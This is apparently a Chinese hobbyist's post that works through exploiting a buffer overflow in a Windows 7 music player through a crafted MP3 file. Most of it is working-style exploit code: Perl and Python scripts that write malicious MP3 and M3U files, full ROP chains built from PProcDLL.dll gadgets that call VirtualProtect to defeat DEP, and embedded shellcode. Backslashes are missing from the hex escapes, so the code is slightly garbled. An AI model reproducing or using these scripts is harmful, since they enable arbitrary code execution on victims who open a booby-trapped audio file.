默认情况下 WIN7 安装这个软件 对这个软件exe DEP是没开启的 如果这是这样的话,可能有点难度,如果能再给一个没有开启DEP的DLL那么就更好了
~_~ 更好破的说~_~
软件是一个音乐播放器,运行后 加载一个 MP3 才会加载漏洞DLL,并且 音乐播放完毕后,DLL没有卸载出 没有使用 FreeLibrary,
所以有EXE+DLL 两个没有 开启DEP 的地址让我们去利用
http://www.exploit-db.com/exploits/17383/
如果默认情况下~~~~~~~~~~~~~~~~WIN7 OPTIN下 这个软件没开启DEP
简便方法:Perl POC 如下:
my $file = "1.mp3";#perl
my $just= "A"x16;
$just = $just.pack('V',0x100FCB7F);# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN [Module : PProcDLL.dll] **
$just = $just."x90"x60;
$just = $just.pack('V',0x100D7C2A);# PUSH EDI # PUSH 5F6C7789 # POP ESI # POP EBP # POP EBX # ADD ESP,14 # RETN 18 [Module : PProcDLL.dll] **
$just = $just."x90"x24;
$just = $just.pack('V',0x100346E8);# ADD EBP,0A4 # MOV ESP,EBP # POP EBP # RETN [Module : PProcDLL.dll] **
$just = $just."x90"x24; #top 0x18
$just = $just."x90"x56;
$just = $just.pack('V',0x10101BB8);# PUSH ESP # RETN [Module : PProcDLL.dll] **
my $shellcode = "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx5Bx0Cx8Bx5Bx0Cx8Bx1Bx8Bx1Bx8Bx5Bx18x8BxEBxADx3Dx6Ax0Ax38x1Ex75x05x95xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53x68x64x61x30x23x68x23x50x61x6Ex8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";
my $payload= $just.$shellcode;
print length($payload);
open($FILE,">$file");
binmode($FILE);
print $FILE $payload;
close($FILE); 
VirtualProtect 3方法
这种情况就是对方的电脑开启了DEP optout
bcdedit /set nx alwayson
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
注意用 python 写 文件生成时 用 不然会生成错误x0ax0b
import os
evilfile = "1.mp3"
~~~~~~
crashy = open(evilfile,"wb")
crashy.write(sploit)
crashy.close()
perl 写文件时 用 不然会生成错误x0ax0b
my $file = "exploits.m3u";#perl
my $junk= "x41"x26075;
my $payload= $junk;
print length($payload);
open($FILE,">$file");
binmode($FILE);
print $FILE $payload;
close($FILE);
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
python POC:
import os
evilfile = "1.mp3"
junk = "A"*16
shellcode = "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx5Bx0Cx8Bx5Bx0Cx8Bx1Bx8Bx1Bx8Bx5Bx18x8BxEBxADx3Dx6Ax0Ax38x1Ex75x05x95xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53x68x64x61x30x23x68x23x50x61x6Ex8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"
rop_align = "BBBB"
################################# Begin ROP chain #################################
########## Redirect execution back to stack ##########
rop = "x17xBFx0Ex10" #0x100EBF17 : # ADD ESP,20 # RETN 4
rop += rop_align * 9
########## Place stack pointer in EAX ##########
rop += "x7FxCBx0Fx10" #0x100FCB7F : # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN
rop += rop_align * 15
rop += "xC8x1Bx12x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
########## Jump over VirtualProtect() params ##########
rop += "x56x75x13x10" #0x10137556 : # ADD ESP,20 # RETN
########## VirtualProtect call placeholder ##########
rop += "x42x45x45x46" #&Kernel32.VirtualProtect() placeholder - "BEEF"
rop += "WWWW" #Return address param placeholder
rop += "XXXX" #lpAddress param placeholder
rop += "YYYY" #Size param placeholder
rop += "ZZZZ" #flNewProtect param placeholder
rop += "x60xFCx18x10" #lpflOldProtect param placeholder (Writeable Address) - 0x1018FC60 {PAGE_WRITECOPY}
rop += rop_align * 2
########## Grab kernel32 pointer from the stack, place it in EAX ##########
rop += "x5Dx1Cx12x10" * 6 #0x10121C5D : # SUB EAX,30 # RETN
rop += "xD0x64x03x10" #0x100364D0 : # ADD EAX,8 # RETN
rop += "x33x29x0Ex10" *4 #0x100E2933 : # DEC EAX # RETN
rop += "xF6xBCx11x10" #0x1011BCF6 : # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN
rop += rop_align
########## EAX = kernel pointer, now retrieve pointer to VirtualProtect() ##########
rop += "xA6x42x01x10" #0x100142A6 : # POP ESI # RETN [Module : PProcDLL.dll] **
rop += "x45x5exffxff" #0xFFFFF667 = 0-0xA1BB
rop += "xBEx40x01x10" #0x100140BE : # ADD EAX,ESI # RETN [Module : PProcDLL.dll] **
rop += "x01x2Bx0Dx10" #0x100D2B01 : # MOV ECX,EAX # RETN
########## At this point, ECX = &kernel32.VirtualProtect
########## Make EAX point to address of VirtualProtect() placeholder ##########
rop += "xC8x1Bx12x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "xB1xB6x11x10" * 6 #0x1011B6B1 : # ADD EAX,0C # RETN
rop += "x9fx2bx0dx10" * 4 #0x100D2B9F : # SUB EAX,1 # RETN [Module : PProcDLL.dll] **
########## Write VirtualProtect pointer to stack ##########
rop += "x41x2Fx11x10" #0x10112F41 : # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make ECX point to address of nops / shellcode ##########
rop += "xC8x1Bx12x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align * 2
rop += ("x76xE5x12x10" + rop_align) * 3 #0x1012E576 : # ADD EAX,100 # POP EBP # RETN
rop += "x01x2Bx0Dx10" #0x100D2B01 : # MOV ECX,EAX # RETN
########## Make EAX point to return address placeholder ##########
rop += "xC8x1Bx12x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "xB1xB6x11x10" * 6 #0x1011B6B1 : # ADD EAX,0C # RETN
########## Write return address to stack ##########
rop += "x41x2Fx11x10" #0x10112F41 : # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make EAX point to lpAddress placeholder ##########
rop += "xC8x1Bx12x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "xB1xB6x11x10" * 7 #0x1011B6B1 : # ADD EAX,0C # RETN
rop += "xD5xCEx11x10" * 4 #0x1011CED5 : # INC EAX # RETN
########## Write lpAddress to stack ##########
rop += "x41x2Fx11x10" #0x10112F41 : # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Save address of VirtualProtect call placeholder to EBX (for later) ##########
rop += "x77x78x12x10" #0x10127877 : # SUB EAX,7 # POP ESI # RETN
rop += rop_align * 2
rop += "x33x29x0Ex10" #0x100E2933 : # DEC EAX # RETN
rop += "x81x96x03x10" #0x10039681 : # XCHG EAX,EBX # ADD AL,10 # RETN [Module : PProcDLL.dll] **
########## Make EAX point to Size param placeholder ##########
rop += "xC8x1Bx12x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "xB1xB6x11x10" * 6 #0x1011B6B1 : # ADD EAX,0C # RETN
rop += "xD0x64x03x10" #0x100364D0 : # ADD EAX,8 # RETN
########## Craft Size parameter into EAX (Adjust to needed/desired size) ##########
rop += "x01x2Bx0Dx10" #0x100D2B01 : # MOV ECX,EAX # RETN
rop += "x2Cx2Ax0Dx10" #0x100D2A2C : # XOR EAX,EAX # RETN
rop += ("x76xE5x12x10" + rop_align) * 10 #0x1012E576 : # ADD EAX,100 # POP EBP # RETN
########## Write Size param to stack ##########
rop += "x60x83x02x10" #0x10028360 : # MOV DWORD PTR DS:[ECX],EAX # RETN
########## Make EAX point to address of flNewProtect placeholder ##########
rop += "xD2x9Fx10x10" #0x10109FD2 : # MOV EAX,ECX # RETN
rop += "xD0x64x03x10" #0x100364D0 : # ADD EAX,8 # RETN
rop += "x33x29x0Ex10" * 4 #0x100E2933 : # DEC EAX # RETN
rop += "x01x2Bx0Dx10" #0x100D2B01 : # MOV ECX,EAX # RETN
########## Put flNewProtect param (0x00000040) in EAX ##########
rop += "x2Cx2Ax0Dx10" #0x100D2A2C : # XOR EAX,EAX # RETN
rop += "x68xE5x12x10" #0x1012E568 : # ADD EAX,40 # POP EBP # RETN
rop += rop_align
########## Write flNewProtect param to stack ##########
rop += "x60x83x02x10" #0x10028360 : # MOV DWORD PTR DS:[ECX],EAX # RETN
########## Everything is ready to go, Get EBX back into ESP and RETN ##########
rop += "xD8xA3x10x10" #0x10039681 : # XCHG EAX,EBX # ADD AL,10 # RETN
rop += rop_align
rop += "x99x09x11x10" #0x10110999 : # XCHG EAX,ESP # RETN
################################# End ROP chain #################################
nops = "x90" * 300
sploit = (junk + rop + nops + shellcode )
crashy = open(evilfile,"wb")
crashy.write(sploit)
crashy.close()话说 我还不小心把 VirtualProtect 整成了 VirtualAlloc 妈蛋 闹了个乌龙~~~~~~~~~~~~~~~~